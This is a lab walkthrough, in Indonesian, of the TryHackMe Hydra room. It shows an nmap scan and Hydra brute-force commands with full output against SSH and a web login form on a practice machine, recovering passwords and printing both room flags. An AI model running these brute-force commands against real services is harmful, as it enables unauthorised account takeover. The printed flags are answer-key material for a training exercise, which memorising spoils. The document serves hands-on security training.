Pelajari dan gunakan Hydra, cracker logon jaringan cepat, untuk memaksa dan mendapatkan kredensial situs web.
Apa itu Hydra?
Hydra adalah program cracking password online brute force; alat 'hacking' kata sandi masuk sistem cepat. Kita dapat menggunakan Hydra untuk menjalankan daftar dan 'memaksa' beberapa layanan otentikasi. Bayangkan mencoba menebak secara manual kata sandi seseorang pada layanan tertentu (SSH, Formulir Aplikasi Web, FTP atau SNMP) - kita dapat menggunakan Hydra untuk menjalankan daftar kata sandi dan mempercepat proses ini untuk kita, menentukan kata sandi yang benar. Hydra memiliki kemampuan untuk memaksa protokol berikut: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1 + v2 + v3 , SOCKS5, SSH (v1 dan v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC dan XMPP
Untuk informasi lebih lanjut tentang opsi setiap protokol di Hydra, baca halaman alat resmi Kali Hydra: https://en.kali.tools/?p=220
Ini menunjukkan pentingnya menggunakan kata sandi yang kuat, jika kata sandi Anda umum, tidak mengandung karakter khusus dan / atau tidak lebih dari 8 karakter, itu akan rentan untuk ditebak. Ada 100 juta daftar kata sandi yang berisi kata sandi umum, jadi ketika aplikasi out-of-the-box menggunakan kata sandi yang mudah untuk masuk, pastikan untuk mengubahnya dari default! Seringkali kamera CCTV dan kerangka web menggunakan admin: kata sandi sebagai kata sandi default, yang jelas tidak cukup kuat.
Memasang Hydra
Jika Anda menggunakan Kali Linux, hydra sudah diinstal sebelumnya. Jika tidak, Anda dapat mengunduhnya di sini: https://github.com/vanhauser-thc/thc-hydra
Jika Anda tidak memiliki Linux atau lingkungan desktop yang tepat, Anda dapat menggunakan mesin Kali Linux Anda sendiri dengan semua alat keamanan yang diperlukan. Anda bahkan dapat mengontrol mesin di browser Anda! Lakukan ini dengan ruang Kali kami - https://tryhackme.com/room/kali
Baca di atas dan siapkan Hydra.
Task 2 # Using Hydra
Terapkan mesin yang terpasang ke tugas ini, lalu buka http://10.10.31.75 (mesin ini membutuhkan waktu hingga 3 menit untuk boot)
Kita lakukan scnning port dan melihat port apa saja yang terbuka.
┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo nmap -sC -sV -A -Pn 10.10.31.75
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-03 10:31 WIT
Nmap scan report for 10.10.31.75
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 62:a1:59:0c:a0:44:62:52:66:89:34:5c:ed:ee:5f:6f (RSA)
| 256 2d:d9:a6:43:3d:3c:a0:b3:8a:ce:03:de:74:e1:c5:43 (ECDSA)
|_ 256 89:3f:e8:f4:a3:f9:c4:9e:9c:9d:ec:2c:33:a0:35:61 (ED25519)
80/tcp open http Node.js Express framework
| http-title: Hydra Challenge
|_Requested resource was /login
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=3/3%OT=22%CT=1%CU=43667%PV=Y%DS=2%DC=T%G=Y%TM=603EE742
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=106%GCD=1%ISR=10A%TI=Z%II=I%TS=8)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3
OS:=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 344.54 ms 10.9.0.1
2 344.67 ms 10.10.31.75
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.24 seconds
Perintah Hydra
Opsi yang kami berikan ke Hydra tergantung pada layanan (protokol) mana yang kami serang. Misalnya jika kami ingin bruteforce FTP dengan nama pengguna menjadi pengguna dan daftar kata sandi menjadi passlist.txt, kami akan menggunakan perintah berikut: hydra -l pengguna -P passlist.txt ftp://10.10.31.75
Untuk keperluan mesin yang di-deploy ini, berikut adalah perintah untuk menggunakan Hydra di SSH dan formulir web (metode POST).
SSH
hydra -l <username> -P <full path to pass> 10.10.31.75 -t 4 ssh
-l = adalah untuk nama pengguna
-P = menggunakan daftar kata sandi
-t = menentukan jumlah utas yang akan digunakan
Formulir Posting Web
Kami juga dapat menggunakan Hydra untuk memaksa formulir web, Anda harus memastikan bahwa Anda mengetahui jenis permintaan yang dibuat - metode GET atau POST biasanya digunakan. Anda dapat menggunakan tab jaringan browser Anda (di alat pengembang) untuk melihat jenis permintaan, atau cukup melihat kode sumber.
Di bawah ini adalah contoh perintah Hydra untuk memaksa formulir login POST:
hydra -l <username> -P <wordlist> 10.10.31.75 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
-l = nama pengguna tunggal
-P = menunjukkan penggunaan daftar kata sandi berikut
http-post-form = menunjukkan jenis formulir (posting)
/login url = url halaman login
:username = bidang formulir tempat nama pengguna dimasukkan
^USER^ = memberi tahu hydra nama pengguna
password = kolom formulir tempat kata sandi di enntered
^PASS^ = memberi tahu hyrde untuk menggunakan daftar kata sandi yang disediakan sebelumnya
F=incorect = apakah kata ini muncul di halaman, artinya tidak ada
Anda sekarang harus memiliki informasi yang cukup untuk mempraktikkannya dan memaksa kredensial Anda sendiri ke mesin yang diterapkan!
Gunakan Hydra untuk memaksa kata sandi web molly. Apa itu bendera 1?
┌─[cyber@cyber]─[~]
└──╼ $sudo hydra -l molly -P rockyou.txt 10.10.20.168 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-03 11:58:12
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.20.168:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "123456" - 1 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "12345" - 2 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "123456789" - 3 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "password" - 4 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "iloveyou" - 5 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "princess" - 6 of 14344398 [child 5] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "1234567" - 7 of 14344398 [child 6] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "rockyou" - 8 of 14344398 [child 7] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "12345678" - 9 of 14344398 [child 8] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "abc123" - 10 of 14344398 [child 9] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "nicole" - 11 of 14344398 [child 10] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "daniel" - 12 of 14344398 [child 11] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "babygirl" - 13 of 14344398 [child 12] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "monkey" - 14 of 14344398 [child 13] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "lovely" - 15 of 14344398 [child 14] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "jessica" - 16 of 14344398 [child 15] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "654321" - 17 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "michael" - 18 of 14344398 [child 6] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "ashley" - 19 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "qwerty" - 20 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "111111" - 21 of 14344398 [child 10] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "iloveu" - 22 of 14344398 [child 14] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "000000" - 23 of 14344398 [child 9] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "michelle" - 24 of 14344398 [child 11] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "tigger" - 25 of 14344398 [child 12] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "sunshine" - 26 of 14344398 [child 13] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "chocolate" - 27 of 14344398 [child 15] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "password1" - 28 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "soccer" - 29 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "anthony" - 30 of 14344398 [child 5] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "friends" - 31 of 14344398 [child 7] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "butterfly" - 32 of 14344398 [child 8] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "purple" - 33 of 14344398 [child 14] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "angel" - 34 of 14344398 [child 0] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "jordan" - 35 of 14344398 [child 1] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "liverpool" - 36 of 14344398 [child 2] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "justin" - 37 of 14344398 [child 3] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "loveme" - 38 of 14344398 [child 4] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "fuckyou" - 39 of 14344398 [child 5] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "123123" - 40 of 14344398 [child 6] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "football" - 41 of 14344398 [child 7] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "secret" - 42 of 14344398 [child 8] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "andrea" - 43 of 14344398 [child 9] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "carlos" - 44 of 14344398 [child 10] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "jennifer" - 45 of 14344398 [child 11] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "joshua" - 46 of 14344398 [child 12] (0/0)
[ATTEMPT] target 10.10.20.168 - login "molly" - pass "bubbles" - 47 of 14344398 [child 15] (0/0)
[80][http-post-form] host: 10.10.20.168 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-03 11:58:31
Login di browser web dengan:
username : molly
password : sunshine
Answre = THM{2673a7dd116de68e85c48ec0b1f2612e}
Gunakan Hydra untuk memaksa kata sandi SSH molly. Apa itu bendera 2?
┌─[✗]─[cyber@cyber]─[~]
└──╼ $sudo hydra -l molly -P rockyou.txt 10.10.20.168 -t 16 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-03 12:12:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.20.168:22/
[22][ssh] host: 10.10.20.168 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-03 12:12:37
Setelah itu login.! jika sudah menemukan passwornya.
┌─[cyber@cyber]─[~]
└──╼ $sudo ssh molly@10.10.20.168 -p 22
The authenticity of host '10.10.20.168 (10.10.20.168)' can't be established.
ECDSA key fingerprint is SHA256:z7EuqBD03AFDbihpw7yKCZGXvkqfj0tkjG6H/J7ng10.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.20.168' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
65 packages can be updated.
32 updates are security updates.
Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-20-168:~$ ls
flag2.txt
molly@ip-10-10-20-168:~$ cat flag2.txt
THM{c8eeb0468febbadea859baeb33b2541b}
molly@ip-10-10-20-168:~$ Connection to 10.10.20.168 closed by remote host.
Connection to 10.10.20.168 closed.
Answre = THM{c8eeb0468febbadea859baeb33b2541b}